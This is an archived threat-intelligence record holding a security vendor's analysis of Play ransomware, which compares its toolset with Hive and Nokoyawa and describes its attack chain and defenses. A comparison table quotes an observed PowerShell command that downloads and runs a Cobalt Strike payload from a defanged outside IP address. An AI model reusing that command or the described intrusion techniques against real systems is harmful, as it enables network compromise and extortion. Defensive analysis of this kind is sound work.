{
	"id": "b02ca1ff-84ff-48f2-a9d9-59c315d8139f",
	"created_at": "2026-04-06T00:12:41.814602Z",
	"updated_at": "2026-04-10T13:12:25.965225Z",
	"deleted_at": null,
	"sha1_hash": "998a0cb68372b309ce8c32cce2a5034f4c6053d7",
	"title": "Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 295199,
	"plain_text": "Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa\r\nPublished: 2022-09-06 · Archived: 2026-04-05 16:49:24 UTC\r\nIn July, we investigated a spate of ransomware cases in the Latin American region that targeted government entities, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “PLAY,” and the ransomware group’s contact email address (Figure 1). Victims of this ransomware first surfaced in Bleeping Computer forums in June 2022. A month later, more details about Play ransomware were published on the “No-logs No breach” website.\r\nFigure 1. Play ransomware’s ransom note\r\nFurther analysis of these ransomware infections, however, revealed that Play uses many tactics that follow the playbook of both Hive and Nokoyawa ransomware (Tables 1 and 2), including similarities in the file names and file paths of their respective tools and payloads. 
Earlier this year, we found evidence that suggests that the attackers behind Nokoyawa are related to those behind Hive, owing to the many similarities between their attack chains.\r\nNotably, one behavior that sets Play ransomware apart from Hive and Nokoyawa is its use of AdFind, a command-line query tool capable of collecting information from Active Directory (AD), as a means of discovery (Figure 2). Hive, on the other hand, has been observed using tools like the TrojanSpy.DATASPY trojan to gather information in a victim’s system.\r\n\r\nIndicator | Purpose | Nokoyawa and Hive ransomware | Play ransomware\r\nNekto/PriviCMD | Privilege escalation | ✓ | ✓\r\nCobalt Strike | Staging | ✓ | ✓\r\nCoroxy/SystemBC | Remote access | ✓ | ✓\r\nGMER | Defense evasion | ✓ | ✓\r\nPCHunter | Discovery and defense evasion | ✓ | \r\nAdFind | Discovery |  | ✓\r\nPowerShell scripts | Discovery | ✓ | \r\nPsExec | Lateral deployment of ransomware | ✓ | ✓\r\nTable 1. A comparison of similarities in the overall flow and behavior of the Play and Nokoyawa/Hive ransomware families\r\n\r\nTactic/Tools | Nokoyawa and Hive ransomware | Play ransomware\r\nNekto/PriviCMD | %public%\\Music\\svhost.exe | %userprofile%\\Music\\t2747.exe\r\nCobalt Strike download | -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('_hxxp://185.150.117[.]186:80/asdfgsdhsdfgsdfg'))\" | -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('hxxp://8\r\nCoroxy/SystemBC | %userprofile%\\Pictures\\socks.exe, %systemroot%\\System32\\sok.exe | %public%\\Music\\soks.exe\r\nRansomware deployment | C:\\PerfLogs\\xxx.exe, %mytemp%\\xxx.exe | C:\\PerfLogs\\xxx.exe, %mytemp%\\xxx.exe\r\nTargets | Most targets are in Latin America | Most targets are in Latin America\r\nTable 2. 
A comparison of tools and tactics in the attacks of Play and Nokoyawa/Hive ransomware families\r\nFigure 2. Play ransomware’s use of AdFind\r\nRelated Malware Campaigns\r\nThough not all of the Play ransomware infections that we analyzed shared malware indicators with those of Hive and Nokoyawa ransomware, their many shared tactics and tools suggest a high probability of affiliation between these ransomware families. This ransomware merits further investigation, and we plan on validating the related URLs from Play ransomware infections by checking their watermarks. This is to determine whether these were indeed related to any Hive infections in the past, as was done previously with Nokoyawa infections.\r\nAdditionally, we have found evidence that points to a possible connection between Play ransomware and Quantum ransomware, which is an offshoot of the notorious Conti ransomware group. The Cobalt Strike beacons that were used in Play's attacks bear the same watermark, 206546002, as those previously dropped by the Emotet and SVCReady botnets that have also been observed in Quantum ransomware attacks. This suggests that the two ransomware groups share some of the same infrastructure.\r\nDuring our investigation, we found indicators pointing to a likely Emotet infection. Though there are currently no spam campaigns using the Emotet trojan, we did detect a few cases of Emotet being used to deploy Cobalt Strike beacons bearing the same 206546002 watermark that was found in beacons involved in Play's ransomware attacks.\r\nInfection Routine\r\nThe malware authors behind Play ransomware have been known to use compromised valid accounts or exploit unpatched Fortinet SSL VPN vulnerabilities to gain access to an organization’s network (Figure 3). 
Like most modern ransomware, Play uses living-off-the-land binaries (LOLBins) as part of its attacks: for example, it uses the remote tool WinSCP for data exfiltration, and Task Manager for Local Security Authority Subsystem Service (LSASS) process dumping and credential cracking.\r\nPlay ransomware also uses double extortion techniques against its victims. In its attacks, data exfiltration is performed prior to the deployment of the ransomware: it archives a victim’s files using WinRAR and then uploads the files to sharing sites. The ransomware executable is distributed via Group Policy Objects (GPO), then run using scheduled tasks, PsExec, or wmic.\r\nFigure 3. Play ransomware’s infection chain\r\nInitial Access\r\nPlay’s ransomware actors commonly gain initial access through valid accounts that have been reused across multiple platforms, have previously been exposed, or were obtained through illegal means. This includes Virtual Private Network (VPN) accounts, not just domain and local accounts. Exposed RDP servers are also abused to establish a foothold. Another technique Play ransomware uses is the exploitation of the FortiOS vulnerabilities CVE-2018-13379 and CVE-2020-12812.\r\nCVE-2018-13379 is a path traversal vulnerability in the FortiOS SSL VPN web portal that allows an unauthenticated attacker to download OS system files through specially crafted HTTP resource requests. On the other hand, CVE-2020-12812 is an improper-authentication vulnerability in FortiOS SSL VPN that allows a user to log in without being prompted for FortiToken, the second factor of authentication, if they change the case of their username.\r\nExecution\r\nWe observed Play ransomware’s usage of scheduled tasks and PsExec during its execution phase. 
Another one of Play’s techniques involves the creation of a GPO, as GPOs are able to control many user and machine settings in the AD. The GPO deploys a scheduled task across the AD environment, and the task executes the ransomware at a specific date and time.\r\nThe ransomware also uses batch files to execute PsExec, a legitimate Windows tool in the Sysinternals suite. This tool’s ability to execute processes on other systems allows the rapid spread of the ransomware and assists Play in its reconnaissance activities.\r\nPersistence\r\nAfter the Play ransomware actors gain initial access through valid accounts, they will continue to use these accounts as a persistence mechanism. If Remote Desktop Protocol (RDP) access is disabled in a victim’s system, the malicious actors will enable it by executing “netsh” commands so that they can establish inbound connections to a victim’s system. The ransomware executable is dropped in the Domain Controller shared folders (NETLOGON or SYSVOL) and is run by a scheduled task or PsExec, after which encryption of the victim’s files takes place.\r\nPrivilege Escalation\r\nPlay ransomware uses Mimikatz to extract high-privilege credentials from memory. Afterward, the ransomware actors add accounts to privileged groups, one of which is the Domain Administrators group. They perform vulnerability enumeration through Windows Privilege Escalation Awesome Scripts (WinPEAS), a script that searches for possible local privilege escalation paths.\r\nDefense Evasion\r\nThe ransomware uses tools such as Process Hacker, GMER, IOBit, and PowerTool to disable antimalware and monitoring solutions. 
It covers its tracks using the Windows built-in tool wevtutil or a batch script, which removes indicators of its presence, such as Windows Event Log entries or malicious files. It disables Windows Defender protection capabilities through PowerShell or the command prompt. The PowerShell scripts that Play ransomware uses, like Cobalt Strike beacons (Cobeacon) or Empire agents, are encoded in Base64.\r\nCredential Access\r\nPlay ransomware also uses Mimikatz to dump credentials. The tool can be dropped directly on the target host or executed as a module through a command-and-control (C\u0026C) application like Empire or Cobalt Strike. We also observed the malware’s use of the Windows tool Task Manager to dump the LSASS process from memory.\r\nDiscovery\r\nDuring the discovery phase, the ransomware actors collect more details about the AD environment. We’ve observed that AD queries for remote systems have been performed by different tools, such as AdFind, Microsoft Nltest, and BloodHound. 
The threat actor also enumerated system information such as hostnames, shares, and domain information.\r\nLateral Movement\r\nPlay ransomware may use different tools to move laterally across a victim’s network:\r\n- Cobalt Strike SMB beacon is used as a C\u0026C beacon, a method of lateral movement, and a tool for downloading and executing files.\r\n- SystemBC, a SOCKS5 proxy bot that acts as a backdoor with the ability to communicate over Tor, is used as a backdooring mechanism.\r\n- Empire is an open-source post-exploitation framework used to conduct Play ransomware’s post-exploitation activity.\r\n- Mimikatz is used to dump credentials and gain domain administrator access on victim networks to conduct lateral movement.\r\nExfiltration\r\nA victim’s data is often split into chunks instead of whole files prior to its exfiltration, an approach that Play ransomware may use to avoid triggering alerts on network data transfers. The ransomware actors use WinSCP, an SFTP and FTP client for Microsoft Windows. They also use WinRAR to compress the files in .RAR format for later exfiltration. We were able to identify a web page developed in PHP that is used to receive the exfiltrated files.\r\nImpact\r\nAs mentioned earlier, after the ransomware encrypts a file, it adds the extension “.play” to that file. A ransom note, ReadMe.txt, is created in the root of the hard drive (C:). In all the cases we investigated, the ransom notes contained an email address following this format: [seven random characters]@gmx[.]com.\r\nInfection Distribution\r\nLike Hive and Nokoyawa ransomware, most of Play ransomware’s attacks affected organizations located in the Latin American region, with Brazil topping the list. Organizations in Argentina, Hungary, India, the Netherlands, and Spain also experienced Play attacks.\r\n
Security Recommendations\r\nThe results of our investigation into Play ransomware’s attacks highlight the evolution of threats that are designed to evade detection. Organizations should be wary of malicious actors using red-team or penetration-testing tools to blend in with a targeted system’s environment.\r\nEnd users and organizations alike can mitigate the risk of infection from ransomware like Play by following these security best practices:\r\n- Enable multifactor authentication (MFA) to prevent attackers from performing lateral movement inside a network.\r\n- Adhere to the 3-2-1 rule when backing up important files. This involves creating three backup copies on two different file formats, with one of the copies stored in a separate location.\r\n- Patch and update systems regularly. It’s important to keep operating systems and applications up to date and maintain patch management protocols that can deter malicious actors from exploiting any software vulnerabilities.\r\nUsers and organizations can benefit from the use of multilayered detection and response solutions such as Trend Micro Vision One™, which provides powerful XDR capabilities that collect and automatically correlate data across multiple security layers — email, endpoints, servers, cloud workloads, and networks — to prevent attacks via automated protection, while also ensuring that no significant incidents go unnoticed. Trend Micro Apex One™ also provides next-level automated threat detection and response to protect endpoints against advanced issues, like human-operated ransomware.\r\n
Indicators of Compromise (IOCs)\r\nHashes\r\nURLs\r\nSource: https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html"
	],
	"report_names": [
		"play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434361,
	"ts_updated_at": 1775826745,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/998a0cb68372b309ce8c32cce2a5034f4c6053d7.pdf",
		"text": "https://archive.orkl.eu/998a0cb68372b309ce8c32cce2a5034f4c6053d7.txt",
		"img": "https://archive.orkl.eu/998a0cb68372b309ce8c32cce2a5034f4c6053d7.jpg"
	}
}